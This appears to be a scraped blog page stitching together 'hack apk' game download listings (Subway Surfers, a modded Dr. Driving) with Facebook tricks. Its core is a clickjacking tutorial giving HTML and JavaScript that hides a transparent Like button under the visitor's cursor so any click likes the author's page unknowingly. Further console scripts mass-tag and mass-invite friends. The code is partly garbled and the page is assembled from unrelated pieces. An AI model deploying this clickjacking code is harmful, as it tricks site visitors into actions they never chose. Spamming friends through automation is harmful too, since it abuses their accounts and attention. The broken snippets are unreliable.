Subway Surfers São Paulo 1.25.0 Hack Apk Free Download

Subway Surfers

DASH as fast as you can!
DODGE the oncoming trains!

Help Jake, Tricky & Fresh escape from the grumpy Inspector and his dog.
★ Grind trains with your cool crew!
★ Colorful and vivid HD graphics!
★ Hoverboard Surfing!
★ Paint powered jetpack!
★ Lightning fast swipe acrobatics!
★ Challenge and help your friends!
Join the most daring chase!
A Universal App with HD optimized graphics.
By Kiloo Games and Sybo Games

What's New
★ Follow the Subway Surfers World Tour to São Paulo
★ Join the weekly Top Run race and compete against players from your country
★ Add Edison, the Brazilian soccer kid, to your Surfer crew
★ Boost your collection with the iconic Banana board and cool Outfits for Edison and Zoe
★ Reach the best Ranks in the Top Run race to get cool Awards

Additional information


100,000,000 - 500,000,000

Current Version

Requires Android
2.3.3 and up

Content Rating
Low Maturity


Dr. Driving Modded Latest Version 1.33 Unlimited Coins/Golds

Dr. Driving

Dr. Driving drives you crazy!
Burn up the street with the fastest and most visually stunning driving game.
Sign in with your Google account to play online multiplayer.
You can get free gold when you finish mission before opponent in multiplayer (Max 1,000 Gold).
Login with Facebook ID to share highs scores with your friends. And 100 Gold will be provided.
SUD Inc.

What's New
- lower car price
- more multi play bonus (up to 1,000 Gold)
- bug fix

Additional information


10,000,000 - 50,000,000

Current Version

Requires Android
2.3.3 and up

Content Rating


Automatically Increase Facebook Fans Using JavaScript

Automatically Increase Facebook Fans Using JavaScript

Well today i have found another simple to be applied script for your blogs or website which can gain few more unique likes to your facebook page, with this script applied any unique visitor who comes to your page can become your fan. He just needs to click anywhere on the webpage as a small invisible like button will follow his mouse cursor and as soon he clicks anywhere he will be liking your fan page. So now straight away jumping on how it can be applied in a webpage or blog just follow the below simple steps.
facebook Likes

How to Add This JavaScript to blogger?

  • Go to blogger—>Template—>Edit HTML
  • Hit “proceed”
  • Tick on “Expand Widget Template” Check box
  • Search for </head> in your blogs HTML and paste the below script above it.
<script src="" type="text/javascript">
<script type='text/javascript'>
function ClickJackFbHide(){
function ClickJackFbShow(){

  •  Now again search for </body> in your blogs HTML and paste below code above it.
<div id="clickjack-button-wrapper-5" style="position: absolute; opacity: 0; filter: alpha(opacity = 0); -ms-filter:'progid:DXImageTransform.Microsoft.Alpha(Opacity=0)';  margin-left: -50px; z-index: 100; width:27px; height:20px; overflow:hidden">

<!--<div style="position: absolute; top: 5px; left: 5px; z-index: 1000; height: 13px; width: 15px;"></div>-->

<iframe src=" URL Link&amp;layout=button_count&amp;show_faces=false&amp;width=50&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:45px; left:-19px; height:21px; z-index: 0; position: relative;" allowTransparency="true"></iframe>

<script type="text/javascript">
( document ).ready( function() {
( "#clickjack-button-wrapper-5" ).parent().mousemove( function( e ) {
( "#clickjack-button-wrapper-5" ).css( {
: e.pageY - 10,
: e.pageX + 30
} );
} );
var clickjack_fb_timer = setTimeout("clickjack_hider()",5000);
} );
function clickjack_hider(){
(".ratingblock").mouseout(function(){ClickJackFbShow();});         jQuery("object").mouseout(function(){ClickJackFbShow();});
(".ratingblock").mouseover(function(){ClickJackFbHide();});         jQuery("object").mouseover(function(){ClickJackFbHide();});
  • Now just replace the red line in above code with your facebook page URL written in yellow and that’s it now just save the template and jump over to your website to test it out.
Now as soon as you refresh your blog you will see that your cursor has been changed into the hand one as there is a link moving with it. Now your blog readers will see similar thing and ass soon as they will click it they will become your page fan.

Remember :- There are some issues you might face using this script in your website or blog, the first thing is that when people drag they might not able to select the text as they will a semi visible Like button which will be attached to your mouse cursor as it moves, the second one some other gadgets might get affected and act weirdly, try using it if everything works ok than start increasing your fans :)

Automatically Poke back to your Friend EASY method

In older post we seen the tutorials about ‘Automatically Increase Facebook Fans Using JavaScript ‘ through installing the script, i hope you all enjoyed that post. Now today i came up with another trick in Facebook. actually we know the POKE feature in facebook, Poke is a feature led by facebook to get attention of any user, well you can compare it wit the Buzz option we had in Yahoo Chat, so we used to click on Buzz and then the other person’s chat used to vibrate and make sounds to get their attention, its somewhat same but yes off course it does not make your screen vibrate but if leave a notification without any message or anything but just saying that person poked you and you can poke him back to say yes I remember you :)
So now manually poking back to many person’s might be a big problem so we have simple solution to this thing by making this process automatic. Now we have two options by which you can make this thing automatic. The one is by using the chrome extension that will work only in chrome and the other one is Userscript that will work in both Chrome and Firefox.

Auto Poke Back using Chrome Extension

Well Poke All for Chrome extension gives you the possibility to poke all your friends back all together with one click. Well yes it even has that automatic feature which you can select and every poke will be reverted back automatically. So now you can install this extension only in chrome.
So now after installation just visit Facebook and click on this hand icon in your status bar now you c will see all your pokes you can select Auto Poke or just click on the Poke All option.

Auto Poke Back using UserScript

Well there is even a simple userscript that can be installed in Chrome, Firefox and Opera browser, so Facebook Autopoke userscript does the same job but its totally automatic. So you will need Greasemonkey installed in your Firefox browser to get this script working.

So that’s it now you can every Poke you receive will be reverted back automatically, if you find any problem do comment.

Automatically Tag all your Friends on any Facebook Status at once

Facebook has tagging feature that we are using for notifying our friend that something is really important for him or her. and they should check it out. Generally, you can tag any Facebook friend in any status update or images so that they can be notified. but it will take more time to search for the friend and then tag him.
Here i gonna share an easy way to tag all your friends automatically in your status comment section using JavaScript. all your Facebook friends will be notified about what you have posted into that status update.

How to Tag all Facebook Friends at Once

If you are searching for the same then you are at right place, just follow simple steps below and see how it can be done.
1) Go to and post normal status update., and go to the direct URL of the status update post by clicking on timestamps .

2) Now, You will be on direct URL of the status update, so, right click and choose “Inspect Element”

3) Now you have to click on the Console tab then paste the JavaScript inside it, given below.


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After pasting above javascript, hit enter and see the magic, almost all your facebook friends will be tagged automatically in the status comments section. Now your all facebook friends will be notified about your status update, and you will start receiving likes and comments. ;)

How to Invite ALL Friends together to like the fanpage ON FACEBOOK

Well, Facebook has good feature called “Invite Friends” which  helps us to gain likes by inviting your Facebook friends. even your fan also can invite their friend to like your Facebook fan page as well. but i don’t think anyone will be interested to invite their friends to like your Facebook page. :P if anyone become your fan then they are impressed by your page’s posts or different stuff which they haven’t seen elsewhere earlier. but they don’t care about your page likes. but one thing is good in this feature that you can invite your Facebook friends to like your page. but it also boring work to send invitation one by one friends by clicking on “invite” button.  Now days, i am receiving a lot of request and invitation by the friends to like their Facebook fan page.  but some of them inviting  me personally on Facebook chat/messages to like their page. but this is not good way, sometimes it looks like someone trying to harassing me :P and no doubt, i have also done these type of things with my Facebook friends when i had very low amount of likes in my Facebook page.

Well, come up to this post. here in this article i am gonna share different way of invite all friends to like your Facebook fan page by one click. we have to use just a simple script that will automatically invite all your friends by clicking on single button. So, just follow the simple steps below and enjoy..
1 ) Open your Facebook page, where you desired to invite your friends.
2 ) Now just navigate to Build Audience > Invite option.
3 ) Now, a dialog box will be appear with invite option with all your friends name.
4 ) Press F12 to open inspect element tab.
5) Go to the console tab and copy paste the following script.
var inputs = document.getElementsByClassName('uiButton _1sm');
for(var i=0; i<inputs.length;i++) {
6 ) After pasting above code into console tab, Hit enter and then see the magic ! all your friends will be invited to like your Facebook page.

Hope this tutorial helps you to invite all your friends to like your Facebook page. if you face any
problem while processing the steps feel free to ask me via comment. and also do not forget to
share this with your friends. :)

Subway Surfers Tokyo 1.24.0 Download Free

 Subway Surfers

DASH as fast as you can!
DODGE the oncoming trains!

Help Jake, Tricky & Fresh escape from the grumpy Inspector and his dog.
★ Grind trains with your cool crew!
★ Colorful and vivid HD graphics!
★ Hoverboard Surfing!
★ Paint powered jetpack!
★ Lightning fast swipe acrobatics!
★ Challenge and help your friends!
Join the most daring chase!
A Universal App with HD optimized graphics.
By Kiloo Games and Sybo Games

What's New
★ Travel to Japan with the Subway Surfers World Tour
★ Grind trains with charming Harumi in vibrant Tokyo
★ Drift through the Subway on the powerful Windglider board
★ Customize your crew with cool new Outfits for Harumi and Ninja
★ Reach new goals to earn the Board Rider Award

Additional information


100,000,000 - 500,000,000

Current Version

Requires Android
2.3.3 and up

Content Rating
Low Maturity
